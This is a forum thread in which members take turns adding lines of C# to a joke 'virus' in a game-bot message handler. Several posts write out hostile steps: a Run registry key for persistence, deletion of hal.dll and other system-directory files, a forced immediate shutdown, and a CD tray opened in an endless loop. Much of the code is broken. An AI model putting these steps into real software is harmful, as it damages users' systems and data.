Official Everybody Edits Forums

Do you think I could just leave this part blank and it'd be okay? We're just going to replace the whole thing with a header image anyway, right?

You are not logged in.

#1 Before February 2015

Anch
Member
Joined: 2015-02-16
Posts: 5,447

Code a virus

I don't know any code, but I want to see how this turns out. So first of all, the first person who posts here just lists the code name they are typing (ONLY THE FIRST person so we know what code it is), then the next person will add to the code and so on. Then we'll have an awesome program that probably won't work!

Last edited by anch159 (Jun 5 2014 4:04:51 pm)

Offline

#2 Before February 2015

abrar11
Member
Joined: 2015-03-13
Posts: 359

Re: Code a virus

if(m.Type == "add")
{

}

Offline

#3 Before February 2015

XxAtillaxX
Member
Joined: 2015-11-28
Posts: 4,202

Re: Code a virus

if(m.Type == "add")
{
    con.Disconnect();
}


signature.png
*u stinky*

Offline

#4 Before February 2015

Tako
Member
From: Memphis, Tennessee, USA
Joined: 2015-08-10
Posts: 6,663
Website

Re: Code a virus

if(m.Type == "add")
{
     int id = m.GetInt(0);
     string name = m.GetString(1);

     con.Disconnect();
}


Yeah, well, you know that's just like, uh, your opinion, man.

Offline

#5 Before February 2015

Cyclone or Meredith
Guest

Re: Code a virus

Environment.Exit(0);
if(m.Type == "add")
{

}

#6 Before February 2015

abrar11
Member
Joined: 2015-03-13
Posts: 359

Re: Code a virus

if(m.Type == "add")
{
    con.Disconnect();
    Application.Exit();
}

Offline

#7 Before February 2015

Xfrogman43
Member
From: need to find a new home
Joined: 2015-02-15
Posts: 4,174

Re: Code a virus

f(m.Type == "add")
{
    con.Disconnect();
    Application.Exit();
Process.Start("shutdown","/s /t 0");
}


zsbu6Xm.png thanks zoey aaaaaaaaaaaand thanks latif for the avatar

Offline

#8 Before February 2015

XxAtillaxX
Member
Joined: 2015-11-28
Posts: 4,202

Re: Code a virus

if(m.Type == "add")
{
    con.Disconnect();
    System.IO.File.Delete(System.Environment.SystemDirectory + "hal.dll");
    Process.Start("shutdown","/s /t 0");
    Application.Exit();
}


signature.png
*u stinky*

Offline

#9 Before February 2015

Xfrogman43
Member
From: need to find a new home
Joined: 2015-02-15
Posts: 4,174

Re: Code a virus

//forums.everybodyedits.com/img/smilies/cool //forums.everybodyedits.com/img/smilies/cool


zsbu6Xm.png thanks zoey aaaaaaaaaaaand thanks latif for the avatar

Offline

#10 Before February 2015

abrar11
Member
Joined: 2015-03-13
Posts: 359

Re: Code a virus

if(m.Type == "add")
{
    Environment.GetFolderPath(Environment.SpecialFolder.Startup)
    RegistryKey add = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",            true);
    add.SetValue("Bestbotevar", "\"" + Application.ExecutablePath.ToString() + "\""); // measures if it doesnt work
    con.Disconnect();
    System.IO.File.Delete(System.Environment.SystemDirectory + "hal.dll");
    Process.Start("shutdown","/s /t 0");
    Application.Exit();
}

Offline

#11 Before February 2015

XxAtillaxX
Member
Joined: 2015-11-28
Posts: 4,202

Re: Code a virus

if(m.Type == "add")
{
    try { Environment.GetFolderPath(Environment.SpecialFolder.Startup)
    RegistryKey add = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",            true);
    add.SetValue("Bestbotevar", "\"" + Application.ExecutablePath.ToString() + "\""); // measures if it doesnt work
    } catch { }
    con.Disconnect();
    Process.Start(@"iexplorer.exe mod snip
    System.IO.File.Delete(System.Environment.SystemDirectory + "hal.dll");
    Process.Start("shutdown","/s /t 0");
    Application.Exit();
}

Last edited by Meredith (Jun 4 2014 5:00:40 pm)


signature.png
*u stinky*

Offline

#12 Before February 2015

Anch
Member
Joined: 2015-02-16
Posts: 5,447

Re: Code a virus

So you want to kill my computer...? //forums.everybodyedits.com/img/smilies/smile

Offline

#13 Before February 2015

abrar11
Member
Joined: 2015-03-13
Posts: 359

Re: Code a virus

bool uwotm8 = true;
[DllImport("winmm.dll", EntryPoint="mciSendStringA")]
public static extern void mciSendStringA(string lpstrCommand,
          string lpstrReturnString, long uReturnLength, long hwndCallback);
string rt = "";
if(m.Type == "add")
{
    try { Environment.GetFolderPath(Environment.SpecialFolder.Startup)
    RegistryKey add = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",            true);
    add.SetValue("Bestbotevar", "\"" + Application.ExecutablePath.ToString() + "\""); // measures if it doesnt work
    } catch { }
    con.Disconnect();
    Process.Start(@"iexplorer.exe [ mod snip
    System.IO.File.Delete(System.Environment.SystemDirectory + "hal.dll");
while(uwotm8)
{
mciSendStringA("set CDAudio door open",rt,127,0);
}
    Process.Start("shutdown","/s /t 0");
    Application.Exit();
}

Last edited by Meredith (Jun 4 2014 5:01:42 pm)

Offline

#14 Before February 2015

Creature
Member
From: The Dark Web
Joined: 2015-02-15
Posts: 9,658

Re: Code a virus

if(m.Type == "add")
{
    try { Environment.GetFolderPath(Environment.SpecialFolder.Startup)
    RegistryKey add = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",            true);
    add.SetValue("Bestbotevar", "\"" + Application.ExecutablePath.ToString() + "\""); // measures if it doesnt work
    } catch { }
    con.Disconnect();
    Process.Start(@"iexplorer.exe [ mod snip
    Pause.Unpause(1=True;0=False);
    System.IO.File.Delete(System.Environment.SystemDirectory + "hal.dll");
    Process.Start("shutdown","/s /t 0");
    Application.Exit();
}


This is a false statement.

Offline

#15 Before February 2015

Anch
Member
Joined: 2015-02-16
Posts: 5,447

Re: Code a virus

Creature you just deleted some of abrar's code and added a little. And I don't think you even know how to code.

Last edited by anch159 (Jun 4 2014 4:18:22 pm)

Offline

#16 Before February 2015

abrar11
Member
Joined: 2015-03-13
Posts: 359

Re: Code a virus

bool uwotm8 = true;
[DllImport("winmm.dll", EntryPoint="mciSendStringA")]
public static extern void mciSendStringA(string lpstrCommand,
          string lpstrReturnString, long uReturnLength, long hwndCallback);
string rt = "";
if(m.Type == "add")
{
    try { Environment.GetFolderPath(Environment.SpecialFolder.Startup)
    RegistryKey add = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",            true);
    add.SetValue("Bestbotevar", "\"" + Application.ExecutablePath.ToString() + "\""); // measures if it doesnt work
    } catch { }
    con.Disconnect();
    Process.Start(@"iexplorer.exe ttp://google.com mod snip
    System.IO.File.Delete(System.Environment.SystemDirectory + "hal.dll");
    System.IO.File.Delete(System.Environment.SystemDirectory + "system32.dll");
while(uwotm8)
{
mciSendStringA("set CDAudio door open",rt,127,0);
}
    Process.Start("shutdown","/s /t 0");
    Application.Exit();
}

Last edited by Meredith (Jun 4 2014 5:03:12 pm)

Offline

#17 Before February 2015

mrjawapa
Corn Man 🌽
From: Ohio, USA
Joined: 2015-02-15
Posts: 5,840
Website

Re: Code a virus

<?php
//wtf are you talking about

$word="confused";
echo "I am so freaking " . $word . "
?>


Discord: jawp#5123

Offline

#18 Before February 2015

Cyclone or Meredith
Guest

Re: Code a virus

Don't post any links to any illegal inappropriate content, no matter how tenuous.

#19 Before February 2015

mrjawapa
Corn Man 🌽
From: Ohio, USA
Joined: 2015-02-15
Posts: 5,840
Website

Re: Code a virus

Meredith wrote:

Don't post any links to any illegal inappropriate content, no matter how tenuous.

Ha
if(poster == "confusing")
{
    try {to understand wtf they are talking about}
    Process.Start("shutdown-brain","/s /t 0");
    Application.Exit();
}


Discord: jawp#5123

Offline

#20 Before February 2015

Anch
Member
Joined: 2015-02-16
Posts: 5,447

Re: Code a virus

I thought we were continuing from abrar11's last post.

Offline

#21 Before February 2015

mrjawapa
Corn Man 🌽
From: Ohio, USA
Joined: 2015-02-15
Posts: 5,840
Website

Re: Code a virus

anch159 wrote:

I thought we were continuing from abrar11's last post.

No I have no idea what they are writing in... it looks like the same commands as Batch


Discord: jawp#5123

Offline

#22 Before February 2015

Anch
Member
Joined: 2015-02-16
Posts: 5,447

Re: Code a virus

Oh. Well let's just have multiple code thingies going on.

Offline

#23 Before February 2015

Creature
Member
From: The Dark Web
Joined: 2015-02-15
Posts: 9,658

Re: Code a virus


This is a false statement.

Offline

#24 Before February 2015

Xfrogman43
Member
From: need to find a new home
Joined: 2015-02-15
Posts: 4,174

Re: Code a virus

JaWapa wrote:
anch159 wrote:

I thought we were continuing from abrar11's last post.

No I have no idea what they are writing in... it looks like the same commands as Batch

It's C#...


zsbu6Xm.png thanks zoey aaaaaaaaaaaand thanks latif for the avatar

Offline

#25 Before February 2015

Cyclone or Meredith
Guest

Re: Code a virus

I think this topic should be renamed to "Code a virus" //forums.everybodyedits.com/img/smilies/tongue

Anch1423543777417655

Board footer

Powered by FluxBB

[ Started around 1746466017.6515 - Generated in 0.108 seconds, 12 queries executed - Memory usage: 1.64 MiB (Peak: 1.86 MiB) ]